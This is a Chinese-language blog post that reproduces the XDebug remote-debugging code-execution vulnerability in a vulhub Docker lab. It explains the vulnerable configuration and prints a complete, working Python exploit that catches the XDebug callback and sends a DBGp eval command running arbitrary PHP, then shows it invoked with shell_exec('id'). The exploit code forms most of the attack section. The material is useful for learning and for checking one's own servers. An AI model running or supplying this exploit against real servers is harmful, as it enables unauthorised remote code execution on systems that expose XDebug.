2. 程式人生 > 其它 >XDebug 遠端除錯漏洞(程式碼執行)

XDebug 遠端除錯漏洞(程式碼執行)

阿新 發佈:2020-12-28

技術標籤:WEB安全漏洞復現xdebug安全漏洞

宣告

好好學習,天天向上

漏洞描述

XDebug是PHP的一個擴充套件,用於除錯PHP程式碼。如果目標開啟了遠端除錯模式,並設定remote_connect_back = 1:

xdebug.remote_connect_back = 1
xdebug.remote_enable = 1

這個配置下,我們訪問http://target/index.php?XDEBUG_SESSION_START=phpstorm,目標伺服器的XDebug將會連線訪問者的IP(或X-Forwarded-For頭指定的地址)並通過dbgp協議與其通訊,我們通過dbgp中提供的eval方法即可在目標伺服器上執行任意PHP程式碼。

影響範圍

復現過程

這裡使用2.5.5版本

使用vulhub

/app/vulhub-master/php/xdebug-rce

使用docker啟動

docker-compose build
docker-compose up -d

環境啟動後,訪問

http://192.168.239.129:8080

上exp.py,內容如下

#!/usr/bin/env python3
import re
import sys
import time
import requests
import argparse
import socket
import base64
import binascii
from concurrent.futures import ThreadPoolExecutor


pool = ThreadPoolExecutor(1)
session = requests.session()
session.headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}

def recv_xml(sock):
    blocks = []
    data = b''
    while True:
        try:
            data = data + sock.recv(1024)
        except socket.error as e:
            break
        if not data:
            break

        while data:
            eop = data.find(b'\x00')
            if eop < 0:
                break
            blocks.append(data[:eop])
            data = data[eop+1:]

        if len(blocks) >= 4:
            break
    
    return blocks[3]


def trigger(url):
    time.sleep(2)
    try:
        session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
    except:
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
    parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
    parser.add_argument('-t', '--target', required=True, help='target url.')
    parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
    args = parser.parse_args()
    
    ip_port = ('0.0.0.0', args.listen)
    sk = socket.socket()
    sk.settimeout(10)
    sk.bind(ip_port)
    sk.listen(5)

    pool.submit(trigger, args.target)
    conn, addr = sk.accept()
    conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))

    data = recv_xml(conn)
    print('[+] Recieve data: ' + data.decode())
    g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
    if not g:
        print('[-] No result...')
        sys.exit(0)

    data = g.group(1)

    try:
        print('[+] Result: ' + base64.b64decode(data).decode())
    except binascii.Error:
        print('[-] May be not string result...')

安裝環境

# 要求用python3並安裝requests庫

直接執行,IP自行修改

python3 exp.py -t http://192.168.239.129:8080/index.php -c 'shell_exec('id');'

在這裡插入圖片描述

關閉映象(每次用完後關閉)

docker-compose down

docker-compose常用命令

拉映象(進入到vulhub某個具體目錄後)

docker-compose build
docker-compose up -d

映象查詢(查到的第一列就是ID值)

docker ps -a

進入指定映象裡面(根據上一條查出的ID進入)

docker exec -it ID /bin/bash

關閉映象(每次用完後關閉)

docker-compose down

相關推薦

XDebug 遠端除錯漏洞程式碼執行

技術標籤:WEB安全漏洞復現xdebug安全漏洞 宣告 好好學習,天天向上 漏洞描述 XDebug是PHP的一個擴充套件,用於除錯PHP程式碼。如果目標開啟了遠端除錯模式,並設定remote_connect_back = 1:

CVE-2015-1635-HTTP.SYS遠端執行程式碼漏洞ms15-034

1.1.1  漏洞描述 在2015年4月安全補丁日,微軟釋出的眾多安全更新中,修復了HTTP.sys中一處允許遠端執行程式碼漏洞,編號為:CVE-2015-1635MS15-034 。利用HTTP.sys的安全漏洞,攻擊者只需要傳送惡意的http請求

win10系統無線網絡卡裝置顯示該裝置無法啟動程式碼10如何解決

有部分win10系統使用者在使用無線網絡卡上網的時候,發現只能使用網線連線上網,然後開啟裝置管理器的時候發現無線網絡卡驅動中顯示 該裝置無法啟動(程式碼10操作失敗,請求的操作不成功,該怎麼辦呢,接下來給大

SpringBoot整合Mybatis和Shiro程式碼記錄

本文為個人學習demo記錄隨筆,主要程式碼記錄 *Redis部分忽略,因為僅僅是整合,未測試

全網最詳細的深度學習經典模型RESNET解析【京東特邀專家 朱利明】bilibili視訊學習程式碼解析

這是一篇學習記錄貼 1 import torch 2 import torch.nn as nn 3 from .utils import load_state_dict_from_url

4-8 命令注入命令執行

4-8 命令注入命令執行 命令注入,又稱命令執行漏洞RCE,remote command execute

地鐵最短路徑程式碼部分

地鐵線路的資訊儲存在一份文字文件中,格式為: 地鐵線路總數 線路名1 站名1 站名2 站名3 ...

地鐵線路最短路徑程式碼實現

提供一副地鐵線路圖,計算指定兩站之間最短最少經過站數乘車路線; 地鐵線路的資訊儲存在一份文字文件中,格式如下:

地鐵線路最短線路程式碼實現

#### 專案介紹 ##### 主要功能 提供一副地鐵線路圖,計算指定兩站之間最短最少經過站數乘車路線;輸出指定地鐵線路的所有站點。以北京地鐵為例,地鐵線路資訊儲存在data.txt中,格式如下:

1585七個小矮人程式碼簡化

描述 白雪公主經常為七個小矮人講故事,為了方便,她為這七個小矮人安排了學號,學號分別是 1 至 7 號。有一次,白雪公主又邀請七個小矮人來聽她講故事,但是隻來了六個小矮人,那 麼缺席的那個小矮人是誰呢?

Redis未授權訪問漏洞Windows系統

找msf的rb指令碼目錄,再拷貝下載的rb指令碼到msf指令碼目錄 進入msf後重新載入下

Pytorch 之 MNIST 資料集實現程式碼講解

技術標籤:深度學習基礎 原文連結:https://www.cnblogs.com/cmybky/archive/2004/01/13/12172745.html

xdebug 遠端除錯

---------------------------------------------------- 下面的連結下載對應版本的xdebug. https://xdebug.org/download/historical

運用Yacc和Lex來DIY計算器程式碼部分

技術標籤:編譯原理flex 前言 這篇文章有點makefile的感覺 直接看程式碼應該問題不大,這裡直接附上程式碼,本來想弄在GitHub上,後來覺得太麻煩了,還是直接複製黏貼吧。畢竟這是個小工程,如果大家有更好的想法

python讀取寫入pickle、npy格式檔案程式碼+註釋

技術標籤:Pythonpythonpicklenpy資料讀取與寫入 1 Pickle檔案1.1 介紹1.2 寫入pickle檔案1.3 讀取pickle檔案1.4 讀取後存入txt檔案

【悟空雲課堂】第二十二期:HTTP響應拆分漏洞CWE-113

技術標籤:安全http安全漏洞資訊保安程式碼規範 關注公眾號“中科天齊軟體安全中心”id:woocoom,一起漲知識!

用hive建立的臨時表_【悟空雲課堂】第十九期:用不安全的授權建立臨時檔案漏洞CWE-378...

技術標籤:用hive建立的臨時表 關注公眾號“中科天齊軟體安全中心”id:woocoom,一起漲知識!

分析 Jdbc、JdbcTemplate、Mybatis 原理區別程式碼解析

寫在前面: 原始碼可直接執行: JdbcTemplate 實現mybatis_sql 實現 參考部落格:

在Visual Studio 中使用git——同步到遠端伺服器-下十二

在Visual Studio 中使用git——什麼是Git 在Visual Studio 中使用git——給Visual Studio安裝 git外掛

安信可 ESP32-S 開發板實現移植騰訊物聯開發平臺藍芽 llsync 協議,實現一鍵藍芽快速配網+遠端控制。附帶原始碼

一、前言 本工程用做 安信可科技NodeMCU-ESP32開發板 & 騰訊物聯開發平臺 配網+通訊的示例工程,基於安信可科技NodeMCU-ESP32開發板上演示了終端裝置通過LLSync SDK和Explorer SDK進行配網以及和雲端通訊。